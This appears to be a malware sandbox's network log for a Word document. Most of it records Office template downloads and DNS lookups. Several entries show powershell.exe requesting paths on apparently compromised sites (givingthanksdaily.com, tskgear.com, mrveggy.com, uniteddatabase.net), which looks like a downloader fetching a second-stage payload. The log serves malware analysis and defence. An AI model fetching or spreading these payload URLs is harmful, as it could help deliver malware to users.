    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 271273
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: IUN4l8m4isLLK7L++SLRkQ==
    Last-Modified: Wed, 29 Aug 2018 18:16:49 GMT
    ETag: 0x8D60DDB967B9FA5
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 7297223a-101e-00d5-6197-a070b4000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345749601.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 550906
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: HBIxXIYqdFpkfa1UbrQmfg==
    Last-Modified: Wed, 29 Aug 2018 18:20:59 GMT
    ETag: 0x8D60DDC2BA71326
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 738e14d8-201e-0011-2f97-a00f72000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345750301.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 640684
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: +TNk7sbE/6V2jeVFosNPBw==
    Last-Modified: Wed, 29 Aug 2018 18:15:11 GMT
    ETag: 0x8D60DDB5C4DB3A1
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 02f02c12-801e-0026-1997-a0c232000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:57 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0403391701.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 698244
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 4pziZjpWoUROqjcy/7gpQA==
    Last-Modified: Wed, 29 Aug 2018 18:15:39 GMT
    ETag: 0x8D60DDB6CAEA91D
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: d7f1c987-e01e-001f-2f97-a0392e000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:57 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0403391901.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 1097591
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: v5XpZ+fRzsjv5Ca8ASfT3g==
    Last-Modified: Wed, 29 Aug 2018 18:16:06 GMT
    ETag: 0x8D60DDB7D10C490
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: f8f55181-d01e-00e1-6697-a0df1c000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:57 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0403392101.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 1881952
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: U8X0WyLhM7KNS9O1o1D9vQ==
    Last-Modified: Wed, 29 Aug 2018 18:19:46 GMT
    ETag: 0x8D60DDC0007D57D
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 380b83a1-d01e-0040-6a97-a01187000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:57 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0403392501.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 1310275
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: nJ9JpHIiwYAlzCVXUzepZQ==
    Last-Modified: Wed, 29 Aug 2018 18:17:15 GMT
    ETag: 0x8D60DDBA6587FB6
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: e4f0118c-501e-0148-3a97-a06910000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:57 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0403392701.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 2527736
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 8laspQm0xsAUTSeMcDawqA==
    Last-Modified: Wed, 29 Aug 2018 18:18:47 GMT
    ETag: 0x8D60DDBDD02F94A
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 73ebaaec-101e-0024-1d97-a07c8a000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:57 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    DNS
    162.61.62.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    162.61.62.23.in-addr.arpa
    IN PTR
    Response
    162.61.62.23.in-addr.arpa
    IN PTR
    a23-62-61-162deploystaticakamaitechnologiescom
  • flag-us
    DNS
    23.251.17.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    23.251.17.2.in-addr.arpa
    IN PTR
    Response
    23.251.17.2.in-addr.arpa
    IN PTR
    a2-17-251-23deploystaticakamaitechnologiescom
  • flag-us
    DNS
    183.59.114.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    183.59.114.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    22.236.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.236.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    dual-a-0001.a-msedge.net
    dual-a-0001.a-msedge.net
    IN A
    204.79.197.200
    dual-a-0001.a-msedge.net
    IN A
    13.107.21.200
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360931611_1SOG5TNNJKE1WH1R0&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239360931611_1SOG5TNNJKE1WH1R0&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 621794
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: DFD8B23ACE2A4F1C99B4C97990E9F26A Ref B: LON04EDGE0913 Ref C: 2024-05-20T12:39:22Z
    date: Mon, 20 May 2024 12:39:21 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 792794
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 89EA1689DA75476AAD8A88412D220C27 Ref B: LON04EDGE0913 Ref C: 2024-05-20T12:39:22Z
    date: Mon, 20 May 2024 12:39:21 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 627437
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: B6C515ADB96647A695C925B3A6A34FC9 Ref B: LON04EDGE0913 Ref C: 2024-05-20T12:39:22Z
    date: Mon, 20 May 2024 12:39:21 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 659775
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 3A43083CA57E4BC699E4040793612494 Ref B: LON04EDGE0913 Ref C: 2024-05-20T12:39:22Z
    date: Mon, 20 May 2024 12:39:21 GMT
  • flag-us
    DNS
    205.47.74.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    205.47.74.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    106.246.116.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    106.246.116.51.in-addr.arpa
    IN PTR
    Response
  • 52.109.28.47:443
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    tls, http
    WINWORD.EXE
    1.7kB
    7.7kB
    11
    10

    HTTP Request

    POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

    HTTP Response

    200
  • 66.96.134.60:80
    http://givingthanksdaily.com/web/VK/
    http
    powershell.exe
    308 B
    1.3kB
    5
    3

    HTTP Request

    GET http://givingthanksdaily.com/web/VK/

    HTTP Response

    404
  • 103.197.57.20:80
    http://tskgear.com/wp-content/uploads/2017/Fo/
    http
    powershell.exe
    364 B
    697 B
    6
    4

    HTTP Request

    GET http://tskgear.com/wp-content/uploads/2017/Fo/

    HTTP Response

    301
  • 103.197.57.20:443
    https://tskgear.com/product/foscor-double-helical/
    tls, http
    powershell.exe
    2.1kB
    70.0kB
    34
    59

    HTTP Request

    GET https://tskgear.com/wp-content/uploads/2017/Fo/

    HTTP Response

    301

    HTTP Request

    GET https://tskgear.com/product/foscor-double-helical/

    HTTP Response

    200
  • 88.221.83.184:443
    https://www.bing.com/th?id=OADD2.10239356736264_1E1NQW5LZ8SVSGPEK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    tls, http2
    1.4kB
    6.2kB
    16
    11

    HTTP Request

    GET https://www.bing.com/th?id=OADD2.10239356736264_1E1NQW5LZ8SVSGPEK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

    HTTP Response

    200
  • 177.12.170.95:443
    https://mrveggy.com/erros/tS1/
    tls, http
    powershell.exe
    768 B
    4.1kB
    9
    9

    HTTP Request

    GET https://mrveggy.com/erros/tS1/

    HTTP Response

    403
  • 173.254.237.178:80
    http://uniteddatabase.net/cgi-sys/suspendedpage.cgi
    http
    powershell.exe
    557 B
    8.7kB
    9
    11

    HTTP Request

    GET http://uniteddatabase.net/wp-admin/tf/

    HTTP Response

    302

    HTTP Request

    GET http://uniteddatabase.net/cgi-sys/suspendedpage.cgi

    HTTP Response

    200
  • 23.62.61.162:443
    https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C
    tls, http
    WINWORD.EXE
    1.2kB
    5.9kB
    8
    8

    HTTP Request

    GET https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab
    tls, http
    WINWORD.EXE
    2.6kB
    50.1kB
    34
    41

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab
    tls, http
    WINWORD.EXE
    2.4kB
    41.0kB
    30
    35

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab
    tls, http
    WINWORD.EXE
    1.7kB
    37.5kB
    20
    32

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab
    tls, http
    WINWORD.EXE
    32.0kB
    1.0MB
    571
    738

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab
    tls, http
    WINWORD.EXE
    85.7kB
    3.4MB
    1612
    2459

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab
    tls, http
    WINWORD.EXE
    2.0kB
    30.5kB
    23
    27

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab
    tls, http
    WINWORD.EXE
    2.4kB
    39.7kB
    30
    34

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab
    tls, http
    WINWORD.EXE
    1.8kB
    36.2kB
    21
    31

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab
    tls, http
    WINWORD.EXE
    10.1kB
    278.2kB
    156
    206

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab
    tls, http
    WINWORD.EXE
    8.8kB
    267.7kB
    144
    199

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab
    tls, http
    WINWORD.EXE
    2.6kB
    38.9kB
    31
    33

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab
    tls, http
    WINWORD.EXE
    2.1kB
    41.7kB
    27
    35

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab
    tls, http
    WINWORD.EXE
    2.0kB
    37.5kB
    25
    33

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab
    tls, http
    WINWORD.EXE
    2.5kB
    38.9kB
    31
    33

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab
    tls, http
    WINWORD.EXE
    14.5kB
    340.3kB
    226
    249

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab
    tls, http
    WINWORD.EXE
    36.2kB
    1.2MB
    614
    835

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab
    tls, http
    WINWORD.EXE
    26.9kB
    759.7kB
    432
    549

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab
    tls, http
    WINWORD.EXE
    59.8kB
    1.8MB
    1029
    1334

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab
    tls, http
    WINWORD.EXE
    1.9kB
    25.9kB
    22
    24

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab
    tls, http
    WINWORD.EXE
    2.1kB
    37.1kB
    26
    32

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab
    tls, http
    WINWORD.EXE
    13.0kB
    319.8kB
    203
    236

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab
    tls, http
    WINWORD.EXE
    78.8kB
    2.7MB
    1403
    1962

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab
    tls, http
    WINWORD.EXE
    121.4kB
    3.6MB
    1993
    2555

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab
    tls, http
    WINWORD.EXE
    3.5kB
    71.1kB
    46
    58

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab

